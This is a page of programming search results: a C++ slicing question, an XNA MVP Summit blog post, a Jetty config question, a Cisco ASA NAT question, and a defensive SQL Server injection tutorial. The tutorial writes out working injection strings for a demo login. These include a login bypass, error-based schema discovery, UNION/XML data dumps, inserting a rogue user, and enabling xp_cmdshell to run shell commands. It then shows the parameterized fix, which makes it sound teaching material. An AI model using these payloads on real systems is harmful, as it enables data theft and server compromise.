Search Results

Search found 1685 results on 68 pages for 'no more guessing'.


  • How to call virtual function of an object in C++

    - by SoonDead
    I'm struggling with calling a virtual function in C++. I'm not experienced in C++, I mainly use C# and Java so I might have some delusions, but bear with me. I have to write a program where I have to avoid dynamic memory allocation if possible. I have made a class called List: template <class T> class List { public: T items[maxListLength]; int length; List() { length = 0; } T get(int i) const { if (i >= 0 && i < length) { return items[i]; } else { throw "Out of range!"; } }; // set the value of an already existing element void set(int i, T p) { if (i >= 0 && i < length) { items[i] = p; } else { throw "Out of range!"; } } // returns the index of the element int add(T p) { if (length >= maxListLength) { throw "Too many points!"; } items[length] = p; return length++; } // removes and returns the last element; T pop() { if (length > 0) { return items[--length]; } else { throw "There is no element to remove!"; } } }; It just makes an array of the given type and manages its length. There is no need for dynamic memory allocation, so I can just write: List<Object> objects; MyObject obj; objects.add(obj); MyObject inherits from Object. Object has a virtual function which is supposed to be overridden in MyObject: struct Object { virtual float method(const Input& input) { return 0.0f; } }; struct MyObject: public Object { virtual float method(const Input& input) { return 1.0f; } }; I get the elements as: objects.get(0).method(asdf); The problem is that even though the first element is a MyObject, Object's method function is called. I'm guessing there is something wrong with storing the object in an array of Objects without dynamically allocating memory for the MyObject, but I'm not sure. Is there a way to call MyObject's method function? How? It's supposed to be a heterogeneous collection, by the way, which is why the inheritance is there in the first place. If there is no way to call MyObject's method function, then how should I make my list in the first place?
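    What the question describes is object slicing, and a hedged sketch of the usual fix follows (not from the question itself): virtual dispatch in C++ only happens through pointers or references, so copying a MyObject into a T items[maxListLength] array declared over Object slices it down to a plain Object, and the base method runs. Keeping a list of base-class pointers to statically allocated objects preserves both the no-new requirement and the polymorphism:

        #include <cstdio>

        struct Input {};

        struct Object {
            virtual float method(const Input& input) { return 0.0f; }
            virtual ~Object() {}
        };

        struct MyObject : public Object {
            virtual float method(const Input& input) { return 1.0f; }
        };

        int main() {
            MyObject concrete;        // statically allocated, no new/delete
            Object* objects[8];       // base-class pointers: no slicing
            int length = 0;
            objects[length++] = &concrete;

            Input asdf;
            // Prints 1.000000: the call dispatches to MyObject::method.
            std::printf("%f\n", objects[0]->method(asdf));
            return 0;
        }

    With the question's own container the same idea reads List<Object*> objects; objects.add(&obj); objects.get(0)->method(asdf); the caveat is that every pointed-to object must outlive the list.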

    Read the article

  • MVP Summit 2011 summary and thoughts: The “I hope I don’t cross a line and lose my MVP status” post

    - by George Clingerman
    I've been wanting to write this post summarizing my thoughts about the MVP summit but have been dragging my feet since it's a very difficult one to write. However, seeing Andy (http://forums.create.msdn.com/forums/t/77625.aspx) and Catalin (http://www.catalinzima.com/2011/03/mvp-summit-2011/) and Chris (http://geekswithblogs.net/cwilliams/archive/2011/03/07/144229.aspx) post about it has encouraged me to finally take the plunge. I'm going to have to write carefully though, because I'm going to be dancing around a ton of NDA minefields as well as having to walk the tightrope of not sending the wrong message or having people read too much into what I'm saying. I want to note that most of what I'm about to say is just based on my observations; they're not thoughts that Microsoft has asked me to pass along and they're not things I heard Microsoft say. It's just me sharing what I think after going to the MVP summit. Let's start off with a short imaginary question and answer session. Have the App Hub forums and XBLIG management been handled rather poorly by Microsoft? Yes. Do I think we're going to see changes to that overnight? No. Will it continue to look bad from the outside? Somewhat. Confusing, right? Well, that's kind of how things are right now. Lots of confusion. XNA is doing AWESOME. Like, really, really awesome. As a result of that awesomeness, XNA is on three major platforms: Xbox 360, WP7 and PC. This means that internally Microsoft is really excited and invested in the technology. That's fantastic for XNA and really should show you the future the framework has. It's here to stay. So why are Xbox LIVE Indie Game developers feeling so much pain? The ironic thing is that the pain is being caused by the success of XNA. When XNA was just a small thing, there was more freedom and more focus. It was just us and them. We were an only child. Now our family has grown and everyone has and wants some time with XNA. This gets XNA pulled in all directions, and as it moves onto new platforms, it plays catch-up trying to get those platforms up to speed to where Xbox LIVE Indie Games has grown. Forums, documentation, educational content. They all need to be there because Xbox LIVE Indie Games has all of that and more. Along with the catch-up in features/documentation/awesomeness there's the catch-up that the people on the team have to play. New platforms and new areas of development mean new players, and those new guys don't have the history of being around from the beginning. This leads to a lack of understanding at times of just how important some things are, because they seem so small and insignificant (Rich Text defaulting for new forum profiles would be one thing that jumps to mind). If you're not aware that the forums have become more than just a basic Q&A, if you're not aware that they're a central hub to a very active community, then you don't understand why that small change should be prioritized over something else. New people have to get caught up and figure out how to make a framework and central forum site work for everyone it's now serving. So yeah, a lot of our pain this last year has been simply that XNA is doing well and XBLIG is doing well, so the focus was shifted to catch other things up. It hurts when a parent seems to not have any time for you because they're spending so much time with your new baby brother. Growing pains. All families experience it to some degree, and in our case so does our product family.
I think as WP7 matures we'll see the team figuring out how to give everyone the right amount of attention. While we're talking about some of our growing pains, it is also important to note (although not really an excuse) that the Xbox LIVE Arcade developers complain about many of the same things that we do. If you paid attention to talks and information coming out of GDC 2011, most of the XBLA guys were saying things that sounded eerily similar to what the XBLIG developers are saying (Scott Nichols from GayGamer.net noticed http://twitter.com/#!/NaviFairyGG/status/43540379206811650). Does this mean we should just accept the status quo since we're being treated exactly the same? No way. However, it DOES show that the way we're being treated is no indication of the stability and future of the platform; it's just Microsoft dropping the communication ball on two playing fields. We're not alone and we're not even being treated worse. Not great, but also in a weird way a very good sign. Now on to a few tidbits I think I CAN share from the summit (I'm really crossing my fingers I'm not stepping over some NDA line I shouldn't be). First, I discovered that the XBLIG user base is bigger than I personally had originally estimated. I won't give the exact numbers (although we did beg Microsoft to release some of these numbers, so maybe someday?) but it was much larger than my original guesstimates and I was pleasantly surprised. Maybe some of you guys had the right number when you were guessing, but I know that mine was much too low. And even MORE importantly, the number of users/shoppers is growing at a steady pace as well. Our market is growing! That was fantastic news and really something that I had to share. On to the community manager discussion. It was mentioned. I was mentioned. I blushed. Nothing more to report there than that the blush in my cheeks was a light crimson color. If I ever see a job description posted for that position I have a resume waiting in the wings. I can't deny that I think that would be my dream job... ...so after I finished blushing, the MVPs did make it very, very clear that the communication has to improve. Community manager or not, the single biggest pain point with the Xbox LIVE Indie Game community has been a lack of communication. I have seen dramatic improvement in the team responding to MVPs and I'm even seeing more communication from them on the forums, so I'm hoping that's a long-term change. I really think they understood the issue; the problem remains how to open that communication channel in a way that is sustainable. I think they'll get it figured out and hopefully that's sooner rather than later. During the summit, you may have seen me tweeting about how I was "that guy" (http://twitter.com/#!/clingermangw/status/42740432471470081). You also may have noticed that Andy and Catalin both mentioned me in their summit write-ups. I may have come on a bit strong while I was there...went a little out of character for myself. I've been agitated for a while with the way things have been, and I've been listening to you guys and hearing you be agitated too. I'm also watching some really awesome indie game developers looking elsewhere and leaving the platform. Some of them we might not have been able to keep even with changes, but others are only leaving because of perceptions and lack of communication from Microsoft. And that pisses me off. And I let Microsoft know that I was pissed off. You made your list and I took that list and verbalized it.
I verbalized the hell out of it. [It was actually mentioned that I'm a lot nicer on the forums and in email than I am in person...I felt bad about that, but I couldn't stay silent.] Hopefully it did something, guys; I really did try hard to get the message across. Along with my agitation, I also brought some pride. I mentioned several things in person to the team that I was particularly proud of. From people in the community who are doing an awesome job, to the re-launch of XboxIndies that was going on that week, and even gamers like Steven Hurdle (http://writingsofmassdeduction.com/) who have purchased one XBLIG every day for over 100 days now. The community is freaking rocking it and I made sure to highlight that. So in conclusion, I'd just like to say hang in there (you know, like that picture of the cat). If you've been worried about investing in Xbox LIVE Indie Games because you think it's on shaky ground: it's not. Dream Build Play being about the Xbox 360 should have helped a little to point that out. The team is really scrambling around trying to figure things out and make improvements all around. There are quite a few new gals and guys and it's going to take them time to catch up, and there are a lot of constantly shifting priorities. We all have one toy, one team, and we're fighting for time with it. It's also time for the community to continue spreading our wings and going out on our own more often. The Indie Game Winter Uprising was a fantastic example of that. We took things into our own hands and it got noticed and Microsoft got behind it. They do every time we stand up and do something (look at how many Microsoft employees tweeted or wrote about the re-launch of XboxIndies.com, or at the support I've gotten from them for my weekly XNA Notes). XNA is here to stay; it's time for us to stop being scared of that and figure out how to make our own games the successes they should be. There's definitely a list of things that need to be fixed, things that should be improved, and I think we should definitely keep vocal about that with Microsoft. Keep it short, focused and prioritized. There's also a lot we can do ourselves while we're waiting on them to fix and change things. Lots of ways we can compensate for particular weaknesses in the channel. The kind of stuff that we can step up and do ourselves. Do it on our own, you know, the way indies always do. And I'm really looking forward to watching us do just that.

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to terminate the string comparison against a column (usually the username), continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the rest of the original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages expose SQL Server error messages to the user, perform no input cleanup or validation, allow applications to connect with elevated (e.g. sa) privileges, and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will become clear as we walk through two of the most common coding patterns that enable SQL injection attacks, and show how to remove the vulnerability: 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to properly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First comes the SQL code that builds the table and test data, then the C# code with the actual SQL injection example from beginning to end. The comments in the code explain what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of our hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists.
It uses SQL concatenation on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out the column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIdusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! Here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId, and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all the column names that // are being returned by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreak havoc// Because 0 can be implicitly converted to any data type in SQL Server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns from our previous hacks.// Because SUM works for UserId we know it's an integer type.
It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for the UserName and UserPassword columns, giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our own data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data from the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from the error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all the data one by one// The second method gives us all the data at once, and we can use it as soon as we find a non-string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all the table data, including our injected user account.// By using the XML trick we can get any database or server info we wish, as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in the master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough, here's a way the attacker can gain shell access to your underlying Windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store them in the ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the previous 3 statements to do other nasty stuff to the Windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this, chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as shown in the following example.
/* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; }} We have seen just how much danger we're in if our code is vulnerable to SQL injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done, and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup.
/*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same as with the SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example, but in all my years of reading SQL forums and answering questions there have been quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using properly parameterized SQL you have a vulnerability, and SQL injection can bare its ugly teeth.
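    If dynamic SQL inside a stored procedure genuinely can't be avoided, the usual advice is to fence identifiers with QUOTENAME and pass all values as real parameters through sp_executesql. A minimal hedged sketch of that pattern (not from the article), reusing the Users table from above:

        /* Identifiers go through QUOTENAME so injected text cannot escape
           the brackets; values are never concatenated at all. */
        CREATE PROCEDURE spSaferAccessSproc
            @tableName SYSNAME
          , @userName  VARCHAR(50)
        AS
        BEGIN
            DECLARE @sql NVARCHAR(500);
            SET @sql = N'SELECT * FROM ' + QUOTENAME(@tableName)
                     + N' WHERE UserName = @name';
            -- @name stays a parameter all the way down to the server
            EXEC sp_executesql @sql, N'@name VARCHAR(50)', @name = @userName;
        END
        GO

    Checking @tableName against a whitelist of expected table names before building the string would tighten this further.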

    Read the article

  • Jetty 7 + MySQL Config [java.lang.ClassNotFoundException: org.mortbay.jetty.webapp.WebAppContext]

    - by Scott Chang
    I've been trying to get a c3p0 db connection pool configured for Jetty, but I keep getting a ClassNotFoundException: 2010-03-14 19:32:12.028:WARN::Failed startup of context WebAppContext@fccada@fccada/phpMyAdmin,file:/usr/local/jetty/webapps/phpMyAdmin/,file:/usr/local/jetty/webapps/phpMyAdmin/ java.lang.ClassNotFoundException: org.mortbay.jetty.webapp.WebAppContext at java.net.URLClassLoader$1.run(URLClassLoader.java:200) at java.security.AccessController.doPrivileged(Native Method) at java.net.URLClassLoader.findClass(URLClassLoader.java:188) at java.lang.ClassLoader.loadClass(ClassLoader.java:307) at java.lang.ClassLoader.loadClass(ClassLoader.java:252) at org.eclipse.jetty.webapp.WebAppClassLoader.loadClass(WebAppClassLoader.java:313) at org.eclipse.jetty.webapp.WebAppClassLoader.loadClass(WebAppClassLoader.java:266) at org.eclipse.jetty.util.Loader.loadClass(Loader.java:90) at org.eclipse.jetty.xml.XmlConfiguration.nodeClass(XmlConfiguration.java:224) at org.eclipse.jetty.xml.XmlConfiguration.configure(XmlConfiguration.java:187) at org.eclipse.jetty.webapp.JettyWebXmlConfiguration.configure(JettyWebXmlConfiguration.java:77) at org.eclipse.jetty.webapp.WebAppContext.startContext(WebAppContext.java:975) at org.eclipse.jetty.server.handler.ContextHandler.doStart(ContextHandler.java:586) at org.eclipse.jetty.webapp.WebAppContext.doStart(WebAppContext.java:349) at org.eclipse.jetty.util.component.AbstractLifeCycle.start(AbstractLifeCycle.java:55) at org.eclipse.jetty.server.handler.HandlerCollection.doStart(HandlerCollection.java:165) at org.eclipse.jetty.server.handler.ContextHandlerCollection.doStart(ContextHandlerCollection.java:162) at org.eclipse.jetty.util.component.AbstractLifeCycle.start(AbstractLifeCycle.java:55) at org.eclipse.jetty.server.handler.HandlerCollection.doStart(HandlerCollection.java:165) at org.eclipse.jetty.util.component.AbstractLifeCycle.start(AbstractLifeCycle.java:55) at org.eclipse.jetty.server.handler.HandlerWrapper.doStart(HandlerWrapper.java:92) at org.eclipse.jetty.server.Server.doStart(Server.java:228) at org.eclipse.jetty.util.component.AbstractLifeCycle.start(AbstractLifeCycle.java:55) at org.eclipse.jetty.xml.XmlConfiguration$1.run(XmlConfiguration.java:990) at java.security.AccessController.doPrivileged(Native Method) at org.eclipse.jetty.xml.XmlConfiguration.main(XmlConfiguration.java:955) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) at java.lang.reflect.Method.invoke(Method.java:597) at org.eclipse.jetty.start.Main.invokeMain(Main.java:394) at org.eclipse.jetty.start.Main.start(Main.java:546) at org.eclipse.jetty.start.Main.parseCommandLine(Main.java:208) at org.eclipse.jetty.start.Main.main(Main.java:75) I'm new to Jetty and I want to ultimately get phpMyAdmin and WordPress to run on it through Quercus and a JDBC connection. Here are my web.xml and jetty-web.xml files in my WEB-INF directory. 
jetty-web.xml: <?xml version="1.0"?> <!DOCTYPE Configure PUBLIC "-//Mort Bay Consulting//DTD Configure//EN" "http://jetty.mortbay.org/configure.dtd"> <Configure class="org.mortbay.jetty.webapp.WebAppContext"> <New id="mysql" class="org.mortbay.jetty.plus.naming.Resource"> <Arg>jdbc/mysql</Arg> <Arg> <New class="com.mchange.v2.c3p0.ComboPooledDataSource"> <Set name="Url">jdbc:mysql://localhost:3306/mysql</Set> <Set name="User">user</Set> <Set name="Password">pw</Set> </New> </Arg> </New> </Configure> web.xml: <?xml version="1.0"?> <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN" "http://java.sun.com/j2ee/dtds/web-app_2_2.dtd"> <web-app> <description>Caucho Technology's PHP Implementation</description> <resource-ref> <description>My DataSource Reference</description> <res-ref-name>jdbc/mysql</res-ref-name> <res-type>javax.sql.DataSource</res-type> <res-auth>Container</res-auth> </resource-ref> <servlet> <servlet-name>Quercus Servlet</servlet-name> <servlet-class>com.caucho.quercus.servlet.QuercusServlet</servlet-class> <!-- Specifies the encoding Quercus should use to read in PHP scripts. --> <init-param> <param-name>script-encoding</param-name> <param-value>UTF-8</param-value> </init-param> <!-- Tells Quercus to use the following JDBC database and to ignore the arguments of mysql_connect(). --> <init-param> <param-name>database</param-name> <param-value>jdbc/mysql</param-value> </init-param> <init-param> <param-name>ini-file</param-name> <param-value>WEB-INF/php.ini</param-value> </init-param> </servlet> <servlet-mapping> <servlet-name>Quercus Servlet</servlet-name> <url-pattern>*.php</url-pattern> </servlet-mapping> <welcome-file-list> <welcome-file>index.php</welcome-file> </welcome-file-list> </web-app> I'm guessing that I'm missing a few jars or something. Currently I have placed the following jars in my WEB-INF/lib directory: c3p0-0.9.1.2.jar commons-dbcp-1.4.jar commons-pool-1.5.4.jar mysql-connector-java-5.1.12-bin.jar I have also tried to put these jars in JETTY-HOME/lib/ext, but to no avail... Someone please tell me what is wrong with my configuration. I'm sick of digging through Jetty's crappy documentation.
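    A hedged observation, not part of the original post: the class that can't be found is org.mortbay.jetty.webapp.WebAppContext, while every frame of the stack trace runs through org.eclipse.jetty.* classes. Jetty 7 renamed the old org.mortbay packages to org.eclipse.jetty, so a Jetty 6-style jetty-web.xml fails exactly like this. A sketch of the same file with the renamed classes (assuming the jetty-plus/jetty-jndi modules are enabled and the c3p0 and MySQL jars sit in the server's lib/ext; note c3p0's bean properties are jdbcUrl/user/password rather than Url/User/Password):

        <?xml version="1.0"?>
        <!DOCTYPE Configure PUBLIC "-//Mort Bay Consulting//DTD Configure//EN"
          "http://www.eclipse.org/jetty/configure.dtd">
        <!-- Jetty 7: org.mortbay.jetty.* became org.eclipse.jetty.* -->
        <Configure class="org.eclipse.jetty.webapp.WebAppContext">
          <New id="mysql" class="org.eclipse.jetty.plus.jndi.Resource">
            <Arg>jdbc/mysql</Arg>
            <Arg>
              <New class="com.mchange.v2.c3p0.ComboPooledDataSource">
                <Set name="driverClass">com.mysql.jdbc.Driver</Set>
                <Set name="jdbcUrl">jdbc:mysql://localhost:3306/mysql</Set>
                <Set name="user">user</Set>
                <Set name="password">pw</Set>
              </New>
            </Arg>
          </New>
        </Configure>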

    Read the article

  • Creating static NAT blocks outbound traffic Cisco ASA

    - by natediggs
    Hi everyone, I have two web servers sitting behind a Cisco ASA 5505, which I don't have much experience with. I'm trying to create two static NATs: one static NAT that goes to xx.xx.xx.150 and another that goes to xx.xx.xx.151. I've created the static NAT for the .150 web server and it works FINE. Incoming and outgoing traffic work great. This is the staging web server. I now need to duplicate the setup for the production web server. So, I connect the web server to the firewall, change the public IP address on one of the NICs, reboot the server, and I have outbound internet access. Then I run the command: static (inside,outside) xx.xx.xx.150 192.168.1.x which is successful. I then run the command: access-list acl-outside permit tcp any host xx.xx.xx.150 eq 80 which is also successful. I then try to browse the internet and I get nothing. I try to telnet in through port 80 and I get nothing (though I'm guessing that's because the response to the telnet request is being blocked). I've tried this with the production web server and then I tried it with another web server that is for internal testing, and I have the exact same problem. Both work fine until I run the static NAT rule, and then there is no outbound internet access. I have a feeling that it's something simple that I'm missing, but my limited experience with this device is killing me. Below I've pasted the current configuration. I'm currently trying to get this to work on the .153 server, which is the internal testing server. Once I can verify that works, I'll try it with production. : Saved : ASA Version 8.2(4) ! hostname QG domain-name XX.com enable password passwd names ! interface Ethernet0/0 switchport access vlan 2 ! interface Ethernet0/1 ! interface Ethernet0/2 ! interface Ethernet0/3 ! interface Ethernet0/4 ! interface Ethernet0/5 ! interface Ethernet0/6 ! interface Ethernet0/7 ! interface Vlan1 nameif inside security-level 100 ip address 192.168.1.1 255.255.255.0 ! interface Vlan2 nameif outside security-level 0 ip address XX.XX.XX.148 255.255.255.0 ! interface Vlan3 shutdown no forward interface Vlan1 nameif dmz security-level 50 ip address dhcp !
boot system disk0:/asa824.bin ftp mode passive clock timezone EST -5 clock summer-time EDT recurring dns server-group DefaultDNS domain-name fw.XXgroup.com same-security-traffic permit inter-interface access-list acl-outside extended permit tcp any host XX.XX.XX.150 eq www access-list acl-outside extended permit tcp any host XX.XX.XX.150 eq https access-list acl-outside extended permit tcp any host XX.XX.XX.151 eq www access-list acl-outside extended permit tcp any host XX.XX.XX.151 eq https access-list acl-outside extended permit tcp any host XX.XX.XX.153 eq www access-list inside_access_in extended permit ip 192.168.1.0 255.255.255.0 any access-list inside_nat0_outbound extended permit ip any 192.168.1.32 255.255.255.240 pager lines 24 logging enable logging asdm informational mtu inside 1500 mtu outside 1500 mtu dmz 1500 ip local pool VPNIPs 192.168.1.35-192.168.1.44 mask 255.255.255.0 icmp unreachable rate-limit 1 burst-size 1 asdm image disk0:/asdm-635.bin no asdm history enable arp timeout 14400 global (outside) 1 interface nat (inside) 0 access-list inside_nat0_outbound nat (inside) 1 0.0.0.0 0.0.0.0 static (inside,outside) XX.XX.XX.150 192.168.1.100 netmask 255.255.255.255 static (inside,outside) XX.XX.XX.153 192.168.1.102 netmask 255.255.255.255 access-group acl-outside in interface outside route outside 0.0.0.0 0.0.0.0 XX.XX.XX.129 1 timeout xlate 3:00:00 timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02 timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00 timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00 timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute timeout tcp-proxy-reassembly 0:01:00 dynamic-access-policy-record DfltAccessPolicy aaa authorization command LOCAL http server enable http 192.168.1.0 255.255.255.0 inside http 0.0.0.0 0.0.0.0 outside no snmp-server location no snmp-server contact snmp-server enable traps snmp authentication linkup linkdown coldstart crypto ipsec transform-set ESP-3DES-SHA esp-3des esp-sha-hmac crypto ipsec security-association lifetime seconds 28800 crypto ipsec security-association lifetime kilobytes 4608000 crypto dynamic-map outside_dyn_map 20 set pfs group1 crypto dynamic-map outside_dyn_map 20 set transform-set ESP-3DES-SHA crypto map outside_map 65535 ipsec-isakmp dynamic outside_dyn_map crypto map outside_map interface outside crypto isakmp enable outside crypto isakmp policy 10 authentication crack encryption 3des hash sha group 2 lifetime 86400 no crypto isakmp nat-traversal client-update enable telnet timeout 5 ssh timeout 5 console timeout 0 dhcpd auto_config outside ! dhcpd address 192.168.1.2-192.168.1.33 inside dhcpd dns 208.77.88.4 interface inside dhcpd enable inside !
